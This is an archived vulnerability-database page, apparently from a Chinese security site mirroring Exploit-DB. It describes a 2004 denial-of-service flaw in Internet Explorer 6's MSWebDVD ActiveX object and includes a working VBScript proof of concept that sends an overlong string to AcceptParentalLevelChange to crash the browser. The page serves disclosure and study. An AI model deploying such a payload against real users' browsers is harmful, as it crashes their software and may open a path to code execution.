Microsoft Internet Explorer 6 – MSWebDVD Object Denial of Service

Microsoft Internet Explorer 6 – MSWebDVD Object Denial of Service

漏洞ID 1054438 漏洞类型
发布时间 2004-04-06 更新时间 2004-04-06
图片[1]-Microsoft Internet Explorer 6 – MSWebDVD Object Denial of Service-安全小百科CVE编号 N/A
图片[2]-Microsoft Internet Explorer 6 – MSWebDVD Object Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23911
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/10056/info

It has been reported that Internet Explorer may be prone to a denial of service vulnerability that may allow remote attackers to cause the browser to crash. The issue exists in the 'MSWebDVD' Object. An attacker may cause a denial of service condition in an instance of Internet Explorer by evoking the method through a malicious site and sending an excessive string value (about 255 characters) in the following manner:

object.AcceptParentalLevelChange (boolean value),UserName as string,Password
as string

Internet Explorer running in Windows XP has been reported to be affected by this issue, however, it is possible that other versions are affected as well.

Due to the nature of this issue, it has been conjectured that this vulnerability may be leveraged to execute arbitrary code. This has not been confirmed at the moment. 


<script language=vbscript>
'On Error Resume Next
dim mymy2,a

a="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
Set mymy2= CreateObject("MSWebDVD.MSWebDVD.1")
mymy2.AcceptParentalLevelChange False, "xc", a

</script>

相关推荐: Apache mod_perl Module File Descriptor Leakage Vulnerability

Apache mod_perl Module File Descriptor Leakage Vulnerability 漏洞ID 1098954 漏洞类型 Access Validation Error 发布时间 2004-01-21 更新时间 2004-0…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享